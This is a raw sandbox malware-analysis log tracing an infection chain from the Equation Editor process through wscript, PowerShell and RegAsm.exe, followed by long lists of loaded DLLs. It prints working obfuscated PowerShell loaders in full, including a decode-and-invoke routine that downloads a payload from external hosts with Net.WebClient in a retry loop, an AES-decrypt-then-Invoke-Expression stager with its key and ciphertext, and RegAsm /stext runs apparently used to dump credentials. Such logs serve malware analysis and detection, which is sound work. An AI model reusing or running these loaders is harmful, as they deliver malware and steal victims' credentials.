S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdthingstobefrankwithmeeverywhe.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI98685860701936162316809131591218CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Forfrelsens.vbs"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lyur"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\nazcoqq"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\yueuojavag"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: shcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: devrtl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wbemcomn2.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
